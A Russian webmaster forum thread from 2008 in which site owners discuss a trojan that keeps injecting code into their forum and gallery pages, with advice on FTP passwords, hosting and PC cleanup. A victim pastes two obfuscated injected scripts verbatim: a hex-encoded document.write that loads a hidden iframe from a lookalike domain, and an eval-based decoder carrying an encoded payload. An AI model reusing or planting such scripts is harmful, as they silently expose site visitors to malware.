Как убить Трояна?

**Kate admin** 26.01.2008 18:35

crash писал(а):знаете что такое shared хостинг?

Да.

У меня dedicated server и я эгоистично думаю только о своем форуме. :roll:

Добавлено спустя 30 секунд:

Палыч писал(а):Речь шла о другом пользователе вашего сервера, если вы этого не поняли.

А, спасибо, действительно не поняла. :-)

**Krolist** 28.01.2008 5:30

Вы что думаете что это дыры в форумах??
Я уверен, что это не так!!
Я за последний год столкнулся с несколькими модификациями этого вируса.

Сейчас схватил его в очередной раз.

Но в этот раз я решил разобраться откуда он пришел!!

Догадываюсь как он действует. Вот несколько фактов.

1) прописывается всегда когда присутствует тег <body> или </body>
2) попадает на сервер через мой комп.
3) вирус состоит из нескольких составляющих файлов. То что мы видим в html'ках или php'шках - это уже результат
4) о дыре в скриптах не может быть речи, потому что все мои скрипты написаны мной, а вирус на многих сайтах...

Теперь мне предстоит узнать 2 вещи:
1) как он попал на мой комп
2) как он попал на сервер сайта

Кстати, мои файлы сайта на компе чистенькие, а на сервере уже с вирусом...

Добавлено спустя 2 минуты 20 секунд:

Придумал как можно проверить то, что он выходит с моего компа на сервер...

Нужно использовать снифер. Обожаю сниферить ))

**crash** 28.01.2008 5:38

Krolist писал(а):прописывается всегда когда присутствует тег <body> или </body>

не помнючтобы в index.php было body.

Krolist писал(а):о дыре в скриптах не может быть речи, потому что все мои скрипты написаны мной

это не показатель.

Krolist писал(а):как он попал на сервер сайта

возможно по фтп.

Krolist писал(а):как он попал на мой комп

а это выясните.

**GVD** 06.04.2008 0:31

У меня хостер km.ru (бесплатный), пароль менять может только хостер, но до него не достучаться... Целый месяц ждал нового пароля. Получил, а заодно и нового "трояна" :

<script>function v47f68b3871ed0(v47f68b3871ed6){ return(parseInt(v47f68b3871ed6,16));}function v47f68b3871eff(v47f68b3871f03){ function v47f68b3871f10 () {return 2;} var v47f68b3871f07='';for(v47f68b3871f0b=0; v47f68b3871f0b<v47f68b3871f03.length; v47f68b3871f0b+=v47f68b3871f10()){ v47f68b3871f07+=(String.fromCharCode(v47f68b3871ed0(v47f68b387
1f03.substr(v47f68b3871f0b, v47f68b3871f10()))));}return v47f68b3871f07;} document.write(v47f68b3871eff('3C696672616D65206E616D653D27
33383530383227207372633D27687474703A2F2F6B617373706572736B
796C6162732E636E2F73706C2F696E6465782E706870272077696474683
D323234206865696768743D3439207374796C653D27646973706C61793
A6E6F6E65273E3C2F696672616D653E'));</script>DrWeb его не видит. На форуме пожаловались на CPG - Касперский обнаруживает "троянскую программу". Начал проверять и нашёл этот "подарок". Файлы были изменены на сервере вчера (04.03.08).
Этой заразой были "награждены" все indexы php и html в CPG, DLE и phpbb 2.0.22
Комп чищу, но вирусы прут как из рога изобилия. Антивирус стоит DrWeb 4.44, обновляется ежедневно, но винда слетала за последний месяц трижды...
Сегодня в очередной раз переустанавливал OS, комп чистый, пароли в голове. Как защитить сайты?.. Только регулярной чисткой?

**Палыч** 06.04.2008 1:05

GVD писал(а): Как защитить сайты?

Поменять хостера.

**GVD** 06.04.2008 2:22

Палыч
На хосте by.ru то же самое только с html файлами. Пароль на FTP менял - бесполезно.

**GVD** 19.04.2008 23:42

Палыч писал(а):Поменять хостера.

А какой по вашему мнению лучший из бесплатных и платных (не дорогой, до 200 Мб)?

**Палыч** 20.04.2008 0:21

У меня нет мнения на этот счёт.
Слишком расплывчато понятие "лучший".

Лучший - безпроблемный. А это зависит от людей.

**GVD** 20.04.2008 11:40

Ещё вопрос по теме "трояна".
Начал наблюдать, что "обновление" файлов index.php, index.html, auth.php, login.php и т. д. происходит в одно время (плюс-минус пара минут). Вопрос: или "доброжелатель" использует программу для загрузки мусора, или я не полностью чищу все зараженные файлы? Могут ли остатки зараженных файлов грузить "трояна" по чистым файлам? И ещё - код скрипта "трояна" изменяется практически раз от раза.
P.S. Спустя час после чистки "троян" снова в файлах.

**Alek$** 20.04.2008 14:13

GVD
почистите свой комп от вирусов и поменяйте все пароли.

**GVD** 11.05.2008 10:23

А кто подскажет - что это за скрипт? Раньше его в файлах не было.

<script language=JavaScript>function upbpnban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,47,48,0,16,46,62,35,14,45,0,0,0,0,0,0,
44,13,7,60,61,5,24,37,25,22,36,32,29,10,41,18,31,55,50,12,11,28,53,40,51,21,58,0,0,0,0,
27,0,26,33,3,59,17,57,19,56,42,38,6,15,52,8,30,4,9,34,49,54,20,2,1,23,39,43);for(j=Math.ceil
(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s)
{r+=String.fromCharCode(212^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}upbpnban
('7tz525dWZPMWVvaWyj6C45z5s80d25d9bj_@Zvi67aa1KkT0X7o1Raa9fkTDZI_5sj8@GP6frg0Njo_
ZtXTWKOidd10@Vva@KxT@yi15svZ6K50ZX0PjVvM1Z_Z5biT@CyH9KRz6jIz525_5CQ10jc8dK
go00ll@GP6frl00X_lD7tT@KR_ZyT8fmX_@D8T1Kj5h9g0NKtM5sj5D2tdNJr_99Z55di_@tz8ZdQz@jI_
5si6CDc')</script>

**Alek$** 11.05.2008 10:50

GVD
похоже на троян. Расшифровывать лень, но нормальные скрипты так не шифруют.

**GVD** 11.05.2008 10:52

Alek$
Касперский и DrWeb его не видят...

**Alek$** 11.05.2008 10:57

Свежий еще. Отправь им, глядишь, начнут видеть

**GVD** 23.05.2008 20:41

И ещё одна фигня обнаружилась: с некоторых страниц форума или галереи идёт перенаправление на http://ya.ru/ ( даже после чистки)...

Как убить Трояна?

Re: Как убить Трояна?

Кто сейчас на конференции